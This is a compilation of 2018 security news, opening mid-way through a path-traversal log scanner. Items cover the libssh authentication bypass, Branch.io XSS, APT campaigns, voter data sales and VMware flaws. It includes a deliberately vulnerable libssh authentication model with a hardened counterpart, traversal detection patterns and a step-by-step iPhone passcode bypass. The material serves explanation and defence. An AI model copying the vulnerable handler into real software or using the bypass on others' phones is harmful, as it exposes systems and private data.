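        if match and is_traversal(match.group("target")):
            hits.append((match.group("ip"), match.group("target")))
    return hits


if __name__ == "__main__":
    for ip, target in scan_access_log(SAMPLE_ACCESS_LOG):
        print(f"{ip}\t{target}")
```

The decode loop is bounded and stops when a pass changes nothing, so a target that is not encoded at all costs one pass, and a double-encoded `%252e%252e` still resolves to `..` on the second pass. Note that `..notes` is correctly not flagged: the regex requires a whole `..` segment, not merely two dots.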

Vulnerabilities in Linksys E-Series routers

Researchers at Cisco Talos discovered several vulnerabilities in E-Series routers from Linksys. Multiple OS command injection flaws can be exploited to hack a device and install malware on it.

Unlike the vulnerabilities in D-Link products, the ones found by Talos can only be exploited by an authenticated attacker and the vendor has released patches.


After 2016 Hack, Illinois Says Election System Secure
18.10.2018 securityweek
BigBrothers  Hacking

Illinois officials assured voters Tuesday that their Nov. 6 tallies "will be securely counted" following a data breach that's part of the Justice Department's investigation of Russian meddling in U.S. elections.

Board of Elections Chairman William Cadigan and a group of state and local officials — including Illinois National Guard leaders — said in Chicago that beefed-up measures to monitor and spot cybersecurity risks will ensure a fair and free election.

"We're as prepared as we ought to be right now, given the information we have," Cadigan said. "People should get out and vote because your vote is going to count and at the end of the day, we believe it's going to be securely counted."

The board hired three cybersecurity experts to watch elections and voter-data systems for irregularities, Cadigan said, including one housed at the Illinois State Police Statewide Terrorism and Intelligence Center. Local elections administrators have undergone rigorous training and the National Guard is on call for emergencies.

Officials discovered in summer 2016 that a hacker had downloaded information on up to 76,000 Illinois voters in what federal authorities allege was a concentrated attack by Russian intelligence agents, but whether they penetrated states other than Illinois has never been determined.

State officials notified those affected and there's no indication that voting that fall was affected. But the Illinois breach and its potential damage was evident when it formed part of Justice Department special counsel Robert Mueller's indictment last July of a dozen Russian intelligence agents for hacking. The indictment alleged that the perpetrators stole information from as many as 500,000 voters.

Illinois authorities believe Mueller's investigators are counting even fragments of personal data that were not complete enough to require them to alert a voter.

Officials also noted that despite electronic voting in Illinois, state law requires that each vote leave behind a paper receipt, so any vote that is disrupted electronically can still be audited.

Logan County Clerk and Recorder Sally Turner said county and municipal elections administrators have met several times in the past year for extensive training on spotting and interpreting cyber threats.

"We want our communities and our voters to know that we as election officials in Illinois are focused on protecting our systems with rigorous attention to cybersecurity," Turner said.

Major Gen. Richard Hayes, Illinois' adjutant general, said Defense Department-trained analysts with the National Guard are on call. In case of catastrophe, they're quickly mobilized.

"If someone tries to disrupt the election on Election Day, we can have a guardsman dispatched within an hour anywhere in Illinois," elections board member Chuck Scholl said. "We'll have boots on the ground in whatever county, whatever election authority that's affected, within an hour."


Thousands of servers easy to hack due to a LibSSH Flaw
17.10.2018 securityaffairs
Vulnerability

The Libssh library is affected by a severe flaw that could be exploited by attackers to completely bypass authentication and take over a vulnerable server.
Libssh, a Secure Shell (SSH) implementation library, is affected by a four-year-old severe vulnerability that could be exploited by attackers to completely bypass authentication and take over a vulnerable server without requiring a password.

The flaw is an authentication-bypass vulnerability that was introduced in Libssh version 0.6, released in 2014.

The issue, tracked as CVE-2018-10933, was discovered by Peter Winter-Smith from NCC Group; it stems from a coding error in Libssh.

Exploitation of the flaw is trivial: an attacker only needs to send an “SSH2_MSG_USERAUTH_SUCCESS” message to a server with an SSH connection enabled when it expects an “SSH2_MSG_USERAUTH_REQUEST” message.

“libssh versions 0.6 and above have an authentication bypass vulnerability in the server code. By presenting the server an SSH2_MSG_USERAUTH_SUCCESS message in place of the SSH2_MSG_USERAUTH_REQUEST message which the server would expect to initiate authentication, the attacker could successfully authenticate without any credentials.” reads the security advisory.

The library fails to validate if the incoming “successful login” packet was sent by the server or the client, and also fails to check if the authentication process has been successfully completed.

This means that if a remote attacker sends the “SSH2_MSG_USERAUTH_SUCCESS” response to libssh, the library considers that the authentication has been successfully completed.

Thousands of vulnerable servers are exposed online: a query on the Shodan search engine shows that more than 6,500 servers are affected by the issue.

But before you get frightened, you should know that neither the widely used OpenSSH nor GitHub’s implementation of libssh was affected by the vulnerability.

The Libssh maintainers addressed the flaw with the release of the libssh versions 0.8.4 and 0.7.6.

Experts pointed out that GitHub and OpenSSH implementations of the libssh library are not affected by the flaw.
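The defect is a state-machine one: USERAUTH_SUCCESS (message number 52 in RFC 4252) is a message the server sends, yet the server's packet table also acted on it when it arrived from the client, so no credential check ever ran. The model below is an added example written for this article, not libssh code: it contrasts a server that dispatches message 52 from the peer with one that dispatches only the messages a client may legitimately send during authentication. It also includes a banner-based check for the affected version ranges given in the advisory, useful when triaging an inventory such as a Shodan export; the `SSH-2.0-libssh_<version>` banner layout and the credential callback are assumptions.

```python
"""Model of libssh's server-side authentication handling before and after the
CVE-2018-10933 fix, plus a banner check for the affected version ranges.

Added example: a simplified model written for this article, not libssh code.
"""
import re
from enum import Enum
from typing import Callable, Optional, Tuple

# Message numbers from RFC 4252 (SSH authentication protocol).
SSH_MSG_USERAUTH_REQUEST = 50
SSH_MSG_USERAUTH_FAILURE = 51
SSH_MSG_USERAUTH_SUCCESS = 52

Credentials = Optional[Tuple[str, str]]


class AuthState(Enum):
    UNAUTHENTICATED = "unauthenticated"
    AUTHENTICATED = "authenticated"
    DISCONNECTED = "disconnected"


def demo_credentials_ok(payload: Credentials) -> bool:
    """Constructed stand-in for real password or public-key verification."""
    return payload == ("alice", "correct horse battery staple")


class VulnerableServerAuth:
    """Server whose packet table handles USERAUTH_SUCCESS regardless of role:
    the peer's claim that authentication already succeeded is believed."""

    def __init__(self, check: Callable[[Credentials], bool] = demo_credentials_ok) -> None:
        self.state = AuthState.UNAUTHENTICATED
        self.check = check

    def handle(self, msg_type: int, payload: Credentials = None) -> Optional[int]:
        """Process one client message; return the message number sent back, if any."""
        if msg_type == SSH_MSG_USERAUTH_REQUEST:
            if self.check(payload):
                self.state = AuthState.AUTHENTICATED
                return SSH_MSG_USERAUTH_SUCCESS
            return SSH_MSG_USERAUTH_FAILURE
        if msg_type == SSH_MSG_USERAUTH_SUCCESS:
            # Defect: USERAUTH_SUCCESS only ever flows server -> client, yet its
            # effect is applied here when it arrives from the client.
            self.state = AuthState.AUTHENTICATED
            return None
        self.state = AuthState.DISCONNECTED
        return None


class HardenedServerAuth(VulnerableServerAuth):
    """Only messages a client may send during authentication are dispatched;
    a client-originated USERAUTH_SUCCESS ends the session."""

    CLIENT_MESSAGES = frozenset({SSH_MSG_USERAUTH_REQUEST})

    def handle(self, msg_type: int, payload: Credentials = None) -> Optional[int]:
        if msg_type not in self.CLIENT_MESSAGES or self.state is AuthState.DISCONNECTED:
            self.state = AuthState.DISCONNECTED
            return None
        return super().handle(msg_type, payload)


def authenticates_without_credentials(server: VulnerableServerAuth) -> bool:
    """Feed the model the single out-of-order message from the advisory and report
    whether it ended up authenticated without ever checking credentials."""
    server.handle(SSH_MSG_USERAUTH_SUCCESS)
    return server.state is AuthState.AUTHENTICATED


# Banner layout "SSH-2.0-libssh_<version>" is an assumption; adjust to your scanner's data.
BANNER_RE = re.compile(r"SSH-2\.0-libssh[_-](\d+)\.(\d+)\.(\d+)")
FIXED_RELEASES = {(0, 7): (0, 7, 6), (0, 8): (0, 8, 4)}  # from the advisory


def libssh_version_affected(banner: str) -> Optional[bool]:
    """True/False for a libssh banner, None when the banner is not libssh."""
    match = BANNER_RE.search(banner)
    if match is None:
        return None
    version = tuple(int(part) for part in match.groups())
    if version < (0, 6, 0):
        return False  # the bug was introduced in 0.6
    if version[:2] in FIXED_RELEASES:
        return version < FIXED_RELEASES[version[:2]]
    return version[:2] == (0, 6)  # 0.6.x has no fixed release; later lines ship fixed


if __name__ == "__main__":
    print("vulnerable model bypassed:", authenticates_without_credentials(VulnerableServerAuth()))
    print("hardened model bypassed:", authenticates_without_credentials(HardenedServerAuth()))
    for banner in ("SSH-2.0-libssh_0.8.1", "SSH-2.0-libssh_0.8.4", "SSH-2.0-OpenSSH_7.4"):
        print(banner, libssh_version_affected(banner))
```

The general lesson the hardened class encodes is that a protocol handler should be indexed by role as well as by message number: a message the server only ever emits must not have a handler on the server's receive path at all. That also explains the GitHub statement below, since a deployment that never relies on the library's USERAUTH_SUCCESS handling for its public-key path is not exposed to this particular transition.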

Will Dormann (@wdormann), replying to @GitHubSecurity: "Can you clarify as to what makes GitHub Enterprise unaffected? It uses libssh in SSH server mode."

GitHub Security (@GitHubSecurity), Oct 17, 2018: "We use a custom version of libssh; SSH2_MSG_USERAUTH_SUCCESS with libssh server is not relied upon for pubkey-based auth, which is what we use the library for. Patches have been applied out of an abundance of caution, but GHE was never vulnerable to CVE-2018-10933."


Branch.io Flaws may have affected as many as 685 million individuals
17.10.2018 securityaffairs
Vulnerability

More than 685 million users may have been exposed to XSS attacks due to a flaw in Branch.io service used by Tinder, Shopify, and many others.
Security Affairs was the first to publish the news of a DOM-XSS bug affecting Tinder, Shopify, Yelp, and other applications.

The flaws were disclosed a few days ago by the researchers at vpnMentor, who explained that an attacker could have exploited them to access Tinder users’ profiles.

“After initial reconnaissance steps were done, a Tinder domain with multiple client-side security issues was found – meaning hackers could have access to users’ profiles and details.

Immediately after finding these vulnerabilities, we contacted Tinder via their responsible disclosure program and started working with them.” reads the analysis published by vpnMentor.

“We learned that the vulnerable endpoint isn’t owned by Tinder, but by branch.io, an attribution platform used by many big corporations around the globe. The Tinder security team helped us get in touch with them, and accordingly, they’ve put out a timely patch.”

Tinder’s security team immediately launched an investigation and discovered that the go.tinder.com domain was actually an alias for Branch.io-owned custom.bnc.lt.

The Branch.io company provides the leading mobile linking platform, with solutions that unify user experience and measurement across different devices, platforms, and channels.

A large number of major firms use an alias that points to the same custom.bnc.lt host, including Yelp, Western Union, Shopify, RobinHood, Letgo, imgur, Lookout, fair.com and Cuvva, vpnMentor said.

According to vpnMentor, the flaws may have affected as many as 685 million individuals using the vulnerable services.

The DOM-based XSS discovered by the experts would have been easy to exploit in many web browsers; the researchers pointed out that Branch.io failed to use a Content Security Policy (CSP).

Branch.io flaw

The experts urge users to change their passwords as a precaution.

“Digging deeper, we found out many big websites were sharing the vulnerable endpoint in their code and domains, including Shopify, Yelp, Western Union, and Imgur. This means that as many as 685 million users could be at risk.” the experts continue.

“While the flaw has already been fixed, if you have recently used Tinder or any of the other affected sites, we recommend checking to make sure your account hasn’t been compromised. It’s a good idea to change your password ASAP.”

Additional technical details are included in the analysis published by the experts.


Russia-linked BlackEnergy backed new cyber attacks on Ukraine’s state bodies

17.10.2018 securityaffairs APT  BigBrothers

The Security Service of Ukraine (SBU) uncovered a new targeted attack launched by BlackEnergy APT on the IT systems of Ukrainian government entities.
The Security Service of Ukraine (SBU) uncovered a new targeted attack on the information and telecommunication systems of Ukrainian government entities.
The SBU attributed the attack to the BlackEnergy Russia-linked APT group.
“The Security Service of Ukraine has received more evidence of the aggressive actions of Russian intelligence services against Ukraine in cyberspace using a controlled hacker group responsible for carrying out cyberattacks on Ukraine’s critical infrastructure facilities during 2015-2017, known as BlackEnergy and NotPetya,” reads the SBU’s press release.

BlackEnergy made the headlines as the responsible for the massive power outage that occurred in Ukraine in December 2015.

The BlackEnergy malware has been improved over time to target SCADA systems; some variants include the KillDisk component, developed to wipe disks and render systems inoperable.

According to the SBU, the BlackEnergy hackers used new malware samples in a recent series of attacks. The new malicious code acts as surveillance software, implementing surveillance capabilities and remote administration features.

The SBU, along with experts from a well-known antivirus company, determined that the malware involved in the attack consists of updated versions of the Industroyer backdoor.

The specialists involved in the investigation helped the SBU attribute the attack and implement mitigations to protect the IT infrastructure of government agencies.

The malware used in the recent attacks borrows code from Industroyer, as reported by the ukrinform.net website.

“They have a number of similar characteristics, in particular using similar code snippets, computing capabilities of infected systems, etc.” states ukrinform.net.

Experts from the SBU also observed the attackers using hacking tools that the BlackEnergy hackers had used in previous attacks.


Online market for counterfeit goods in Russia has reached $1.5 billion
17.10.2018 securityaffairs
CyberCrime

Group-IB: The online market for counterfeit goods in Russia has reached $1.5 billion, while the number of phishing attacks has surpassed 1,200 daily
Group-IB, an international company that specialises in the prevention of cyber attacks, has estimated that online sales of counterfeit goods are now worth $1.5 billion. This information was first made public by experts from Group-IB’s Brand Protection team at the CyberCrimeCon 2018 international cybersecurity conference.

According to Group-IB, the online market for counterfeit goods in Russia has increased by 23% in a year and totaled more than $1.5 billion in 2017, compared to $1.2 billion in 2016. Fraudsters use their websites to sell household appliances and computer equipment, clothing and footwear, jewelry, accessories, cosmetics, medicinal products, and much more, often at hugely discounted prices – up to 80% off. According to Group-IB’s statistics, every fifth counterfeit product was bought online. On average, Russians spend $78 per year on counterfeit goods.

“For large organisations, the actions of online fraudsters mean not only a direct loss in revenue, but also damaged customer loyalty, brand abuse, and fewer shoppers,” says Andrey Busargin, Director of Brand Protection at Group-IB. “It also leads to a decrease in what we call the psychological price, i.e. the cost that customers are willing to pay for a product from the official retailer. Around 64% of users stop buying a company’s goods after a negative experience.”

Counterfeit goods are not the only threat to popular brands on the Internet. Scammers create fake websites of known brands, fraudulent promotional campaigns, and fake accounts on social media. In recent years, an often-used fraud method has been fake mobile applications: 36% of users are unable to distinguish between genuine and fake apps, and 60% of the latter request access to the user’s personal data.

Fraudsters use various ways to deceive users: phishing websites, fake mobile apps, and accounts and groups on social media. Phishing remains one of the most common forms of online fraud. According to the experts from Group-IB Brand Protection, around 1,270 phishing attacks are carried out daily. The main goals of phishing resources are stealing money from bank cards and obtaining login credentials to personal accounts.

Scammers do not simply copy a company’s website, brand, logos, and colors in addition to registering a similar domain name; they also use the same promotional methods as the legal resources. To secure the traffic they need, scammers ensure that their websites appear at the top of search engine results: 96% of users click on links found on the first page displayed by search engines. Only 35% of them are official resources, however.

Contextual advertising also plays a role: for only $15, it is possible to buy 100 guaranteed visits to a phishing website. Scammers also buy banner ads, use search engine optimisation (SEO), and social media promotion (every day, around 150 social media users are deceived by fraudsters on average). In addition to technological ways of attracting traffic by using bots that target opinion leaders, scammers do not shy away from the classic tactic of mass email blasts purporting to be from popular brands, with 20% of users opening emails that contain content that is characteristic of malware or phishing.

Given that users blindly trust influencers (68% of people choose goods or services based on feedback on social media), scammers create fake accounts. For example, a fake account in Pavel Durov’s name brought in more than $50000 in only a couple of hours after being created. According to Group-IB, 43% of celebrities and 31% of politicians have fake accounts that use their names.

“Fighting online fraudsters and counterfeiting requires adopting serious countermeasures,” warns Andrey Busargin.

“We advise companies to continuously track phishing resources and monitor references to their brand in domain name databases, search engine results, social media, messengers, and context ads so as to identify scammers hiding behind the company’s brand. It is also important to monitor mobile applications, in both official and unofficial stores, in addition to forums, search engine results, social media, and websites where they might be found. To effectively fight against scammers and fraudsters, it is important to detect and block all the resources connected with a fraudulent website. Fraudsters usually create several phishing websites at once, which can be detected using correlation and website affiliation analysis.”


A simple message containing certain symbols could crash the Sony PlayStation 4
17.10.2018 securityaffairs
Hacking

PlayStation 4 gaming consoles could crash when they receive messages containing certain symbols from fellow gamers.
The consoles could freeze while their owners are playing their preferred games; the DoS condition is triggered while the device parses the symbols in a received message.

“There is a new glitch that basically bricks your console and forces you to factory reset it. Even deleting the message from the mobile app doesn’t work. It happened to me during Rainbow Six: Siege. A player from the other team used a dummy account to send the message and crashed my entire team. We all have had to factory reset. Only one of our guys wasn’t affected and he has his messages private.” reads a thread on Reddit.

Many users reported the glitch on the PlayStation 4; even after deleting the message from the mobile app, the problem persists. Some users fixed the issue by restoring the console to factory settings, but in doing so they lost their game data unless they subscribed to the PS Plus service, which backs it up automatically to the Sony cloud.

PlayStation 4 parser error

According to the Reddit thread, some gamers playing online multiplayer games sent the malicious message to members of the opposing team, causing their consoles to crash.

The error triggered by the message is tracked with the PS4 error code CE-36329-3.

Fortunately, the issue could be easily fixed by deleting the crashing message from the mobile app.

Experts recommend rebuilding the console's database to completely fix the problem; below is the step-by-step procedure:

Turn off the PS4 system by pressing the power button on the front panel. The power indicator will blink for a few moments before turning off.
Once the PS4 system is off, press and hold the power button again. Release it after you hear the second beep: one beep will sound when you first press, and another seven seconds later.
Connect the DUALSHOCK 4 with the USB cable and press the PS button on the controller.
Select the Rebuild Database option

PlayStation 4 users can protect their console by allowing messages only from friends; below is the procedure to do so:
Go to Settings > Account Management > Privacy Settings
Enter your password
Select Personal Info | Messaging
Set Messages to either Friends or No


How Cybercriminals are Targeting free Wi-Fi Users?
17.10.2018 securityaffairs
CyberCrime

Free Wi-Fi is convenient, but it is also unsafe and puts users at great risk. Here's how cybercriminals attack users on these open networks.
Free Wi-Fi is one of the most attractive things for users in today's world, which is the main reason so many free public Wi-Fi hotspots can be found without much effort. These open networks are not only free but convenient to use. However, many might not be aware that these free open Wi-Fi hotspots are actually unsafe and put users at great risk.

There are multiple ways in which cybercriminals target the users of these free Wi-Fi hotspots. Many of these users are at least aware that the open networks they connect to are unsafe, but what they do not know is the various ways in which they are being targeted by cybercriminals and hackers on these networks.

Ways in which Hackers Target free Wi-Fi Users

The open-for-all nature of free public Wi-Fi networks makes them unsafe for all users. Cybercriminals are always on the lookout to get their hands on users' personal or financial data, or they look for vulnerabilities that give them access to users' devices. These free networks give cybercriminals the perfect opportunity to fulfill their purpose. The following are some of the common ways in which cybercriminals target free Wi-Fi users.

free Wi-Fi

Man in the middle attack
The man-in-the-middle attack is one of the most commonly used attacks: the cybercriminal places himself between the user and the router, so that all the user's requests actually route through the attacker. In this way the attacker has full control over the network and can easily get what they want from the user.

Carrying out this attack successfully is so easy that it took a 7-year-old girl only 10 minutes to hack into a public Wi-Fi network and access a stranger's laptop. It was a real experiment, and the girl who successfully hacked the network in 10 minutes was Betsy Davies. So, if a 7-year-old can do it in 10 minutes, imagine what a professional can do in a matter of minutes.

Fake Wi-Fi Access Points
It is also easy for cybercriminals to set up fake Wi-Fi access points in public spaces. They can set up rogue Wi-Fi networks, which give them all the data and access to users' devices or systems. It is fairly easy to create: the cybercriminals set up the rogue network as bait, name it something very generic, and wait for users to connect to it.

As soon as the user connects to this rogue network, there are plenty of ways in which the attacker can carry out the attack. One is that the cybercriminal may direct the user to a malicious website where he or she will be forced to download malware onto their system. The second is a spoofed banking page where the attacker wants the user to enter their banking details and financial data so they can easily capture this sensitive information.

Fake Honeypots
Fake honeypots are quite similar to fake Wi-Fi access points; the only difference is that the honeypot is set up in a more sophisticated manner, which increases the chances of more users falling for the trap set by the cybercriminals.

Imagine connecting to an airport's Wi-Fi network where you see two options with similar names and even the same passwords. It is certain that one of these is a honeypot placed there to capture users' data and misuse their sensitive information.

Intercepting your data and credentials

Another very damaging attack is the interception of users' Internet data when they are on these unsecured public Wi-Fi hotspots. Data transmitted on these networks is not encrypted. Since these networks are unsafe, it is easy for hackers to sniff and intercept that data, which can include the user's login credentials.

With this method, cybercriminals easily get their hands on users' data, including their private information. Since this data is not encrypted, the hackers do not have to do much to use it for their evil purposes.

These are some of the common attacks cybercriminals use to target users on free Wi-Fi networks. There is a way to stay protected on these public Wi-Fi hotspots, and we discuss it below.

How to stay protected with VPN on Public Wi-Fi Networks?

The best and most advanced way to stay protected on these unsafe public Wi-Fi hotspots is to use a decent VPN service. Some top VPN providers offer strong security and encryption, which makes it extremely hard for cybercriminals to get access to users' accounts and data.

A VPN not only encrypts all of the user's data to protect their privacy on the web, but also creates a secure tunnel between the user's device and the VPN server which is hard to break into, because the tunnel itself is encrypted and the encrypted data travels through it. Cybercriminals cannot easily get their hands on users' data if they are using one of the best VPN services.

Even if they get their hands on users' data, all they will get is gibberish, because all the top VPN providers offer strong encryption which is not only hard to break but would take years to decrypt even if the hacker uses automated tools.

Final Words

If you use free public Wi-Fi hotspots a lot in places like malls, cafes, restaurants, or any other public space, then you should be aware that these open networks are actually unsafe and can put you in great danger. If you wish to use these free open Wi-Fi networks, then you need to get a decent VPN service and connect to it before surfing the web on these networks.


35 million US voter records available for sale in a hacking forum
17.10.2018 securityaffairs 
BigBrothers

Millions of voter records are available for sale on the Dark Web, experts discovered over 35 million US voter records for sale in a hacking forum.
Millions of voter records are available for sale on the Dark Web, experts from Anomali and Intel 471 discovered 35 million US voter records for sale in a hacking forum.

Researchers have analyzed a sample of voter records and determined the data to be valid with a high degree of confidence.

Records in the voter registration database include personal and voting history information of US residents.

“Certain states require the seller to personally travel to locations in-state to receive the updated voter information.” reads the post published by Anomali.

“This suggests the information disclosure is not necessarily a technical compromise but rather a likely targeted campaign by a threat actor redistributing possibly legitimately obtained voter data for malicious purposes on a cybercrime forum,”

The seller only provided the number of records for the voter lists of three states, asking prices between $1,300 and $12,500:

Louisiana (3 million);
Wisconsin (6 million);
Texas (14 million);
us voter records

The seller also claims to have lists of voters for other states, including Montana, Iowa, Utah, Oregon, South Carolina, Wisconsin, Kansas, Georgia, New Mexico, Minnesota, Wyoming, Kentucky, Idaho, South Carolina, Tennessee, South Dakota, Mississippi, and West Virginia.

According to the seller, voting lists are weekly updated with the help of people in the state governments.

This kind of information is a precious commodity for threat actors; members of the forum have already expressed their interest in the huge trove of data.

“With the November 2018 midterm elections only four weeks away, the availability and currency of the voter records, if combined with other breached data, could be used by malicious actors to disrupt the electoral process or pursue large scale identity theft,” explained Hugh Njemanze, chief executive officer of Anomali.

The persistent access to voter records claimed by the seller represents a serious threat to US voters and to US politics.

“Given the illicit vendor claims of weekly updates of voter records and their high reputation on the hacker forum, we assess with moderate confidence that he or she may have persistent database access and/or contact with government officials from each state.” the report concludes.

“These types of unauthorized information disclosures increase the threat of possible disruptive attacks against the U.S. electoral process such as voter identity fraud and voter suppression.”


Expert disclosed a new passcode bypass to access photos and contacts on a locked iPhone
17.10.2018 securityaffairs
Apple

iOS enthusiast Jose Rodriguez disclosed a new passcode bypass bug that could be exploited to access photos and contacts on a locked iPhone XS.
The security enthusiast Jose Rodriguez has discovered a new passcode bypass bug that could be exploited on the recently released iOS 12.0.1.

A few weeks ago, Rodriguez discovered a passcode bypass vulnerability in Apple's new iOS version 12 that could have been exploited to access photos and contacts on a locked iPhone XS.

Now the expert has discovered a similar flaw that is very easy for an attacker with physical access to execute in order to reach the photo album of a locked device. The bug allows the attacker to select photos and send them to anyone using Apple Messages.

The new passcode bypass attack works on all current iPhone models, including iPhone X and XS devices, running the latest iOS 12 versions, 12 to 12.0.1.

The new hack devised by Rodriguez leverages the Siri assistant and the VoiceOver screen reader to bypass the passcode.

Below the step-by-step procedure for the passcode bypass discovered by Rodriguez:

Call the target phone from any other phone.
Instead of answering the call, click on “Message” in the call window.
Select “Custom” to reply via text message. That will open the Messages input screen.
Invoke Siri to activate VoiceOver, the iOS feature that helps sight-impaired users use an iPhone.
Click on the camera icon.
Invoke Siri with the iPhone’s home button while you double-tap the display. The screen will turn black. This is where the bug kicks in and iOS gets confused.
From here, click on the home button again while the screen remains black.
Swipe up to the upper left corner while the screen remains black. VoiceOver will tell you what you have selected.
Keep swiping to the top left corner until VoiceOver tells you that you can select the Photo Library (“Fototeca” in Rodriguez’ video).
Tap to select Photo Library.
After selecting the Photo Library, iOS will take you back to the message screen, but you’ll see a blank space where the keyboard should be. The blank space is actually an invisible Photo Library.
Click on the shelf handle on top of the blank space to activate the Photo Library.
Now you only have to swipe and double tap to start grabbing photos. Each photo will be pasted in your input field, ready to be sent to any number.

While waiting for a patch, it is possible to mitigate the issue by disabling Siri on the lock screen (go to Settings → Face ID & Passcode (Touch ID & Passcode on iPhones with Touch ID) and disable the Siri toggle under “Allow access when locked”).


Russia-linked APT group DustSquad targets diplomatic entities in Central Asia
17.10.2018 securityaffairs
APT

Kaspersky experts published a detailed analysis of the attacks conducted by the Russian-linked cyber espionage group DustSquad.
Earlier in October, security experts from ESET shared details about the operations of a cyber espionage group tracked as Nomadic Octopus, a threat actor focused on diplomatic entities in Central Asia.

The group has been active since at least 2015; ESET researchers presented their findings at the Virus Bulletin conference.

“ESET researchers recently discovered an interesting cyber espionage campaign active in several countries of Central Asia. We attribute these attacks to a previously undocumented APT group that we have named Nomadic Octopus.” states the blog post published by Virus Bulletin.

“Our findings suggest that this APT group has been active since at least 2015. The main goal of Nomadic Octopus appears to be cyber espionage against high-value targets, including diplomatic missions in the region”

The experts presented their findings at the Virus Bulletin conference.

Now Kaspersky experts published a detailed analysis of the attacks conducted by the group, tracked by the Russian firm as DustSquad, and the tools they used.

Kaspersky has been monitoring the activity of the group for the last two years; DustSquad is a Russian-language cyberespionage group particularly active in Central Asia.

“For the last two years we have been monitoring a Russian-language cyberespionage actor that focuses on Central Asian users and diplomatic entities. We named the actor DustSquad and have provided private intelligence reports to our customers on four of their campaigns involving custom Android and Windows malware.” states the analysis published by Kaspersky Lab.

“The name was originally coined by ESET in 2017 after the 0ct0pus3.php script used by the actor on their old C2 servers. We also started monitoring the malware and, using Kaspersky Attribution Engine based on similarity algorithms, discovered that Octopus is related to DustSquad, something we reported in April 2018.”

The group targets its victims with spear-phishing emails, and the threat actors use Russian malware filenames.

Kaspersky tracked a campaign conducted by the group back to 2014 when hackers targeted entities in the former Soviet republics of Central Asia, plus Afghanistan.

In April 2018, the researchers discovered a new Octopus sample developed to target Windows systems, the malicious code had been disguised as a Russian version of the Telegram app used by the Democratic Choice (DVK) opposition party in Kazakhstan.

The attackers attempted to exploit the Kazakhstan government's threat to block Telegram over its use by the DVK.

DustSquad fake Telegram

The Octopus Trojan is written in Delphi, the same programming language used by Russian-linked APT group Sofacy for the development of the Zebrocy backdoor.

The malicious code implements backdoor features, including the ability to execute commands, upload and download files, take screenshots, and find *.rar archives on the host.

Experts noticed that even though they found malware used by both DustSquad and the Sofacy APT on the compromised machines, the two cyber espionage groups are not linked.

Kaspersky pointed out that many components of the Octopus malware are still unfinished; the attackers likely created the malicious code in a hurry and did not implement certain features, such as communication functionalities.

“Political entities in Central Asia have been targeted throughout 2018 by different actors, including IndigoZebra, Sofacy (with Zebrocy malware) and most recently by DustSquad (with Octopus malware),” continues the Kaspersky report.

“Interestingly, we observed some victims who are ‘threat magnets’ targeted by all of them. From our experience we can say that the interest shown by threat actors in this region is now high, and the traditional ‘players’ have been joined by relative newcomers like DustSquad that have sprung up locally.”

Additional technical details are reported in the analysis, including IoCs.


A crippling ransomware attack hit a water utility in the aftermath of Hurricane Florence
17.10.2018 securityaffairs
Ransomware

A water utility in the US state of North Carolina suffered a severe ransomware attack in the week after Hurricane Florence hit the East Coast of the U.S.
According to the Onslow Water and Sewer Authority (aka ONWASA) some internal systems were infected with the Emotet malware, but the regular water service was not impacted.

According to ONWASA, the infections would require several of the main databases to be completely recreated, fortunately, no customer information was compromised.

“We are in the middle of another disaster following Hurricane Florence and tropical storm Michael,” CEO Jeff Hudson told employees in a video posted on Facebook,

“With a very sophisticated attack they penetrated our defenses, just as they penetrated the city of Atlanta and Mecklenburg county.”

hurricane florence

ONWASA CEO Jeffrey Hudson confirmed that the ransomware attack began on October 4; the IT staff initially thought they had locked out the threat, however, on October 13 the malware started dropping the Ryuk ransomware onto the infected systems.

“An ONWASA IT staff member was working at 3am and saw the attack,” ONWASA said.

“IT staff took immediate action to protect system resources by disconnecting ONWASA from the internet, but the crypto-virus spread quickly along the network encrypting databases and files.”

Operators at the utility did not pay the ransom and opted to recreate the infected systems.

“Ransom monies would be used to fund criminal, and perhaps terrorist activities in other countries,” ONWASA reasoned. “Furthermore, there is no expectation that payment of a ransom would forestall repeat attacks.”

The incident response had a significant impact on the operations of the utility at a critical moment, the aftermath of Hurricane Florence.

ONWASA estimates it will take several weeks to rebuild all of the damaged systems; it will not be possible for customers to pay bills online, and major delays will affect the services provided by the utility.

The effects of Hurricane Florence on Onslow County were significant: schools are still closed and local authorities are still working to clean up debris from the massive storm. It has been estimated that the cost of restoring the normal situation will hit $125m.


VMware addressed Code Execution Flaw in its ESXi, Workstation, and Fusion products
17.10.2018 securityaffairs
Vulnerebility

VMware has addressed a critical arbitrary code execution flaw affecting the SVGA virtual graphics card used by its ESXi, Workstation, and Fusion products.
VMware has released security updates to fix a critical arbitrary code execution vulnerability (CVE-2018-6974) in the SVGA virtual graphics card used by its ESXi, Workstation, and Fusion solutions.

The issue in the VMware products is an out-of-bounds read vulnerability in the SVGA virtual graphics card that could be exploited by a local attacker with low privileges on the system to execute arbitrary code on the host.

“VMware ESXi, Fusion and Workstation contain an out-of-bounds read vulnerability in SVGA device. This issue may allow a guest to execute code on the host.” reads the security advisory published by the company.

VMware credited an anonymous researcher for reporting the flaw through Trend Micro’s Zero Day Initiative (ZDI).

According to the ZDI’s own advisory, the vulnerability was reported to VMware in mid-June.

“This vulnerability allows local attackers to execute arbitrary code on vulnerable installations of VMware Workstation. An attacker must first obtain the ability to execute low-privileged code on the guest system in order to exploit this vulnerability.” read the ZDI’s advisory.

“The specific flaw exists within the handling of virtualized SVGA. The issue results from the lack of proper validation of user-supplied data, which can result in an overflow of a heap-based buffer. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the host OS.”

VMware classified the issue as “medium” severity and assigned it a CVSS score of 6.9.

The same anonymous expert also reported an out-of-bounds write vulnerability in the e1000 virtual network adapter, tracked as CVE-2018-6973, used by Workstation and Fusion.

The CVE-2018-6973 flaw could be exploited by a local attacker to execute arbitrary code; VMware addressed it in September.

This flaw is similar to the previous one: an attacker requires low-privileged access on the target system to exploit the issue.

“This vulnerability allows local attackers to execute arbitrary code on vulnerable installations of VMware Workstation. An attacker must first obtain the ability to execute low-privileged code on the guest system in order to exploit this vulnerability.” states ZDI’s advisory,

“The specific flaw exists within the handling of the virtualized e1000 device. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the host OS.”
